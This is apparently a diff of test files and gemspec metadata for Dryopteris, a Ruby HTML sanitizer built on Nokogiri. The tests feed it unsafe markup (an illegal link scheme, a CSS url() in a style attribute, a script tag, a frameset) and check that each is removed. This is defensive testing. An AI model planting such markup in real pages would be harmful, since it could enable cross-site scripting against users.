+ <a href='jimbo://jim.jim/'>this link should have its href removed because of illegal url</a>
35
+ <a href='http://jim.jim/'>this link should be fine</a>
36
+ HTML
37
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
38
+ nodes = sane.xpath("//a")
39
+ assert_nil nodes.first.attributes['href']
40
+ assert nodes.last.attributes['href']
41
+ end
42
+
43
+ def test_css_sanitization
44
+ html = "<p style='background-color: url(\"http://foo.com/\") ; background-color: #000 ;' />"
45
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
46
+ assert_match(/#000/, sane.inner_html)
47
+ assert_no_match(/foo\.com/, sane.inner_html)
48
+ end
49
+
50
+ def test_fragment_with_no_tags
51
+ assert_equal "This fragment has no tags.", Dryopteris.sanitize("This fragment has no tags.")
52
+ end
53
+
54
+ def test_fragment_in_p_tag
55
+ assert_equal "<p>This fragment is in a p.</p>", Dryopteris.sanitize("<p>This fragment is in a p.</p>")
56
+ end
57
+
58
+ def test_fragment_in_a_nontrivial_p_tag
59
+ assert_equal " \n<p>This fragment is in a p.</p>", Dryopteris.sanitize(" \n<p foo='bar'>This fragment is in a p.</p>")
60
+ end
61
+
62
+ def test_fragment_in_p_tag_plus_stuff
63
+ assert_equal "<p>This fragment is in a p.</p>foo<strong>bar</strong>", Dryopteris.sanitize("<p>This fragment is in a p.</p>foo<strong>bar</strong>")
64
+ end
65
+
66
+ def test_fragment_with_text_nodes_leading_and_trailing
67
+ assert_equal "text<p>fragment</p>text", Dryopteris.sanitize("text<p>fragment</p>text")
68
+ end
69
+
70
+ def test_whitewash_on_fragment
71
+ html = "safe<frameset rows=\"*\"><frame src=\"http://example.com\"></frameset> <b>description</b>"
72
+ whitewashed = Dryopteris.whitewash_document(html)
73
+ assert_equal "<p>safe</p><b>description</b>", whitewashed
74
+ end
75
+
76
+ end
@@ -0,0 +1,40 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class TestStripTags < Test::Unit::TestCase
4
+
5
+ def test_nil
6
+ assert_nil Dryopteris.strip_tags(nil)
7
+ end
8
+
9
+ def test_empty_string
10
+ assert_equal Dryopteris.strip_tags(""), ""
11
+ end
12
+
13
+ def test_return_empty_string_when_nothing_left
14
+ assert_equal "", Dryopteris.strip_tags('<script>test</script>')
15
+ end
16
+
17
+ def test_removal_of_all_tags
18
+ html = <<-HTML
19
+ What's up <strong>doc</strong>?
20
+ HTML
21
+ stripped = Dryopteris.strip_tags(html)
22
+ assert_equal "What's up doc?".strip, stripped.strip
23
+ end
24
+
25
+ def test_dont_remove_whitespace
26
+ html = "Foo\nBar"
27
+ assert_equal html, Dryopteris.strip_tags(html)
28
+ end
29
+
30
+ def test_dont_remove_whitespace_between_tags
31
+ html = "<p>Foo</p>\n<p>Bar</p>"
32
+ assert_equal "Foo\nBar", Dryopteris.strip_tags(html)
33
+ end
34
+
35
+ def test_removal_of_entities
36
+ html = "<p>this is &lt; that &quot;&amp;&quot; the other &gt; boo&apos;ya</p>"
37
+ assert_equal 'this is < that "&" the other > boo\'ya', Dryopteris.strip_tags(html)
38
+ end
39
+
40
+ end
metadata ADDED
@@ -0,0 +1,77 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: jmcnevin-dryopteris
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.2
5
+ platform: ruby
6
+ authors:
7
+ - Bryan Helmkamp
8
+ - Mike Dalessio
9
+ autorequire:
10
+ bindir: bin
11
+ cert_chain: []
12
+
13
+ date: 2009-02-10 00:00:00 -08:00
14
+ default_executable:
15
+ dependencies:
16
+ - !ruby/object:Gem::Dependency
17
+ name: nokogiri
18
+ type: :runtime
19
+ version_requirement:
20
+ version_requirements: !ruby/object:Gem::Requirement
21
+ requirements:
22
+ - - ">"
23
+ - !ruby/object:Gem::Version
24
+ version: 0.0.0
25
+ version:
26
+ description: Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
27
+ email:
28
+ - bryan@brynary.com
29
+ - mike.dalessio@gmail.com
30
+ executables: []
31
+
32
+ extensions: []
33
+
34
+ extra_rdoc_files: []
35
+
36
+ files:
37
+ - README.markdown
38
+ - VERSION.yml
39
+ - lib/dryopteris
40
+ - lib/dryopteris/rails_extension.rb
41
+ - lib/dryopteris/sanitize.rb
42
+ - lib/dryopteris/whitelist.rb
43
+ - lib/dryopteris.rb
44
+ - test/test_basic.rb
45
+ - test/test_strip_tags.rb
46
+ - test/helper.rb
47
+ - test/html5/test_sanitizer.rb
48
+ has_rdoc: true
49
+ homepage: http://github.com/brynary/dryopteris/tree/master
50
+ licenses:
51
+ post_install_message:
52
+ rdoc_options:
53
+ - --inline-source
54
+ - --charset=UTF-8
55
+ require_paths:
56
+ - lib
57
+ required_ruby_version: !ruby/object:Gem::Requirement
58
+ requirements:
59
+ - - ">="
60
+ - !ruby/object:Gem::Version
61
+ version: "0"
62
+ version:
63
+ required_rubygems_version: !ruby/object:Gem::Requirement
64
+ requirements:
65
+ - - ">="
66
+ - !ruby/object:Gem::Version
67
+ version: "0"
68
+ version:
69
+ requirements: []
70
+
71
+ rubyforge_project:
72
+ rubygems_version: 1.3.5
73
+ signing_key:
74
+ specification_version: 2
75
+ summary: HTML sanitization using Nokogiri
76
+ test_files: []
77
+